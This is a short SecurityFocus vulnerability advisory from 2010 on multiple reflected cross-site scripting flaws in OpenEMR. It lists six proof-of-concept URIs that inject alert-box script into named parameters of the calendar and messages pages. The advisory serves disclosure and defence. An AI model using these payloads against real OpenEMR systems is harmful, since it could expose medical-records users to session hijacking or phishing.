OpenEMR Multiple Cross Site Scripting Vulnerabilities

To exploit these issues, an attacker must entice an unsuspecting victim to follow a malicious URI.

The following example URIs are available:

http://www.example.com/openemr/interface/main/calendar/index.php?tplview='<script>alert('XSS');</script>
http://www.example.com/openemr/interface/main/calendar/index.php?pc_category='<script>alert('XSS');</script>
http://www.example.com/openemr/interface/main/calendar/index.php?pc_topic='<script>alert('XSS');</script>
http://www.example.com/openemr/interface/main/messages/messages.php?sortby="<script>alert('XSS');</script>
http://www.example.com/openemr/interface/main/messages/messages.php?sortorder="<script>alert('XSS');</script>
http://www.example.com/openemr/interface/main/messages/messages.php?showall=no&sortby=users%2elname&sortorder=asc&begin=724286<">


 

Privacy Statement
Copyright 2010, SecurityFocus